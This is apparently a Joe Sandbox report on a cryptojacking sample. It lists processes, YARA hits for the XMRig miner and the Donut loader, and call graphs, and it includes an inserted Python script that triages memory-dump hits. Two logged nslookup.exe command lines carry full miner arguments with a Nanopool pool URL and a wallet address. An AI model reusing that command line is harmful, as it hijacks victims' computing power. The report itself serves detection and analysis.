                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:06:42:06
                                                                Start date:30/10/2024
                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                Imagebase:0x400000
                                                                File size:31'744 bytes
                                                                MD5 hash:6A7E9885A2D01DF564B46F8F27258853
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 74%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:06:42:06
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:06:42:07
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\nslookup.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
                                                                Imagebase:0x7ff7ba020000
                                                                File size:89'600 bytes
                                                                MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2900254186.0000000140751000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0DF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0E0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0E49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:13
                                                                Start time:06:42:08
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\nslookup.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
                                                                Imagebase:0x7ff7ba020000
                                                                File size:89'600 bytes
                                                                MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A4F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A4B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A50A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2900249494.0000000140751000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:14
                                                                Start time:06:42:09
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\conhost.exe" "/sihost64"
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2903432689.0000029966FF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2906554821.000002997F6D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.000002996549D000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.00000299654CB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2903432689.0000029966FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false
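The YARA matches above are reported against memory-dump identifiers whose dotted fields encode the target process, the region's base address, its page protection and its region type. The script below is an added example written for this page, not part of the Joe Sandbox report; it parses those identifiers out of the match lines and flags hits that land in executable private memory of a Windows system binary, which is exactly where the Windows_Trojan_Donutloader hits sit in conhost.exe (Target 14), while the XMRig hits in that process are in plain read-write memory. The field interpretation is an assumption checked only against values on this page (0x0E is Target ID 14, 0x40/0x20/0x04 match the PAGE_* constants, 0x20000 and 0x1000000 match MEM_PRIVATE and MEM_IMAGE); the other fields are carried through undecoded, and the system-binary list is illustrative.

```python
"""Triage Joe Sandbox YARA hits by where in memory they landed.

Added example, not part of the Joe Sandbox report. The dump-name field
layout is an assumption checked only against this report's own values:
field 1 is the target index (0x0E == Target ID 14, conhost.exe), field 4
the base address, field 5 the page protection (0x40 == RWX, 0x20 == RX,
0x04 == RW) and field 7 the region type (0x20000 == MEM_PRIVATE,
0x1000000 == MEM_IMAGE). Fields 2, 3, 6 and 8 are kept but not decoded.
"""
import re
from dataclasses import dataclass

# Page protection constants from winnt.h.
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # any PAGE_EXECUTE* value
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # *_READWRITE / *_WRITECOPY

# MEMORY_BASIC_INFORMATION.Type values.
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

# Illustrative (assumed) list of Windows binaries that never legitimately hold private RWX code.
SYSTEM_BINARIES = {"conhost.exe", "svchost.exe", "explorer.exe", "dllhost.exe"}

MATCH_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<src>\S+?\.sdmp)")


@dataclass(frozen=True)
class DumpSource:
    process_index: int   # field 1: Joe Sandbox target ID
    base: int            # field 4: region base address
    protect: int         # field 5: page protection at dump time
    region_type: int     # field 7: MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    raw: str             # full name, including the undecoded fields

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_sdmp(name: str) -> DumpSource:
    """Split '<idx>.<phase>.<id>.<base>.<protect>.<f6>.<type>.<f8>.sdmp'."""
    parts = name.split(".")
    if len(parts) != 9 or parts[8] != "sdmp":
        raise ValueError(f"unexpected dump name: {name}")
    return DumpSource(int(parts[0], 16), int(parts[3], 16),
                      int(parts[4], 16), int(parts[6], 16), name)


def classify(src: DumpSource, host_image: str) -> str:
    """Map a hit's memory attributes to a triage verdict."""
    if src.region_type == MEM_IMAGE:
        return "image"              # hit inside a mapped PE: the file on disk is the lead
    if src.executable:
        if host_image.lower() in SYSTEM_BINARIES:
            return "injected-code"  # executable private memory in a system binary
        return "executable-private"
    return "data"                   # RW heap/stack: strings and configuration, not code


def triage(host_image: str, yara_lines: list[str]) -> list[dict]:
    """Parse report-style YARA match lines and attach a verdict to each."""
    findings = []
    for line in yara_lines:
        m = MATCH_RE.search(line)
        if not m:
            continue
        src = parse_sdmp(m.group("src"))
        findings.append({"rule": m.group("rule").strip(), "base": src.base,
                         "protect": src.protect, "verdict": classify(src, host_image)})
    return findings


# Sample input copied from the Target 14 (conhost.exe) entry of this report.
CONHOST_MATCHES = [
    "• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2903432689.0000029966FF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2906554821.000002997F6D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Author: unknown",
    "• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Author: unknown",
    "• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.000002996549D000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.00000299654CB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2903432689.0000029966FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
]
# The submitted sample's .text section, from the Memory Dump Source entries later in the report.
MAIN_IMAGE_TEXT = "00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp"

if __name__ == "__main__":
    for f in triage("conhost.exe", CONHOST_MATCHES):
        print(f"{f['verdict']:18} {f['rule']:40} base=0x{f['base']:x} protect=0x{f['protect']:02x}")
```

Run stand-alone it prints one verdict per match line: the two Donutloader hits at 0x29965300000 come back as injected-code (RWX, MEM_PRIVATE, inside conhost.exe), the six XMRig hits as data. Hits whose region type is MEM_IMAGE, such as the sample's own .text at 0x401000, are classified as image so that the on-disk file, not an injection, is pursued first.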


                                                                  Execution Graph

                                                                  Execution Coverage:29.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:15
                                                                  Total number of Limit Nodes:0
                                                                  Execution graph (flattened from the rendered figure): 0x4023f2 (_controlfp) -> 0x4010c4 (2 API calls) -> 0x402473; and 0x4022fa -> 0x40232c -> 0x40224f -> 0x402285 -> 0x4010c4 -> 0x402480 -> 0x4010e7 (memset) -> 0x40115b -> 0x401214 (sprintf) -> 0x4012bd -> 0x4022be -> 0x4023e5.

                                                                  Callgraph

                                                                  Callgraph (flattened from the rendered figure; 69 functions, colour legend dropped):
                                                                  • Function_004010C4 -> Function_004019D8, Function_00401D58, Function_00401000, Function_00401C98, Function_00401D98, Function_00401D18
                                                                  • Function_0040224F -> Function_004010C4, Function_00402158, Function_004021EC
                                                                  • Function_004023F2 -> Function_004010C4; Function_004022FA -> Function_0040224F
                                                                  • Function_004018EF -> Function_004014B4 -> Function_00401443, Function_00401970
                                                                  • 31 functions spaced 0x40 apart, Function_00401998 through Function_00402118 (00401998, 004019D8, 00401A18, 00401A58, 00401A98, 00401AD8, 00401B18, 00401B58, 00401B98, 00401BD8, 00401C18, 00401C58, 00401C98, 00401CD8, 00401D18, 00401D58, 00401D98, 00401DD8, 00401E18, 00401E58, 00401E98, 00401ED8, 00401F18, 00401F58, 00401F98, 00401FD8, 00402018, 00402058, 00402098, 004020D8, 00402118), each call Function_004018EF
                                                                  • No edges: Function_004017C6, 004024C7, 004022CB, 004021E5, 00402477, 00401784, 00402487, 00402497, 004024A7, 004024B7, 004010BD, and in the 0x00623000 region 0062346D, 00623E76, 00623678, 006230C0, 00623CDA, 00623D22, 006234AC, 006236B7, 006232B8, 00623686, 00623004, 00623384, 00623D8A, 00623989, 00623290, 00623D9A

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID: 8]GDXE
                                                                  • API String ID: 4041149307-2632714434
                                                                  • Opcode ID: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                  • Instruction ID: 39431a9c6eb76416a74e9ecc622619c51ee20e8814d728a91cb63a132b490c0f
                                                                  • Opcode Fuzzy Hash: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                  • Instruction Fuzzy Hash: 4E712B61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3DCA448744

                                                                  Control-flow Graph

                                                                  Control-flow graph of Function_00401000 (flattened from the rendered figure): 0x401000-0x401045 (call 0x402478) -> 0x401048-0x401050 -> either 0x4010b6-0x4010bb (exit) or 0x401056-0x4010b4, which loops back to 0x401048-0x401050.
                                                                  Strings
